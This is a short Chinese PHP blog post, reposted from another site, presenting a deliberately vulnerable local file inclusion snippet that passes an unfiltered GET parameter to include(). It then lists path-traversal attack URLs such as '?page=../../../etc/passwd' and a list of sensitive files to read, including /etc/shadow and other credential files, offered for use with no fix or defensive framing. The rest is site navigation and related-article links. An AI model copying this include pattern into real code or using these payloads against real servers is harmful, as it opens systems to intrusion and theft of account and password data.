php 伪造本地文件包含漏洞的代码

yipeiwu_com5年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

php使用number_format函数截取小数的方法分析

本文实例讲述了php使用number_format函数截取小数的方法。分享给大家供大家参考，具体如下：大家知道用php的number_format()函数可以将数字按千分组. 但是它会...

为你总结一些php信息函数

PHP信息函数包含的一些函数概念总结如下。 PHP信息函数之getenv 适用版本：PHP3, PHP4 函数功能：取得环境变量数值。函数语法：string getenv (strin...

深入理解PHP中的Session和Cookie

在一个页面设置一个cookie时,必须刷新或到下一个页面才可以用 $_COOKIE 得到变量的值.原因是因为当页面第一次被浏览器访问载入时,页面中的 cookie 会被设置,将其发送存储...

PHP中对用户身份认证实现两种方法

当访问者浏览受保护页面时，客户端浏览器会弹出对话窗口要求用户输入用户名和密码，对用户的身份进行验证，以决定用户是否有权访问页面。下面用两种方法来说明其实现原理。　　一、用HTTP标头来...

PHP 实现代码复用的一个方法 traits新特性

在阅读yii2源码的时候接触到了trait，就学习了一下，写下博客记录一下。自 PHP 5.4.0 起，PHP 实现了代码复用的一个方法，称为 traits。 Traits 是一种为类...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php使用number_format函数截取小数的方法分析

为你总结一些php信息函数

深入理解PHP中的Session和Cookie

PHP中对用户身份认证实现两种方法

PHP 实现代码复用的一个方法 traits新特性

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php使用number_format函数截取小数的方法分析

为你总结一些php信息函数

深入理解PHP中的Session和Cookie

PHP中对用户身份认证实现两种方法

PHP 实现代码复用的一个方法 traits新特性

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号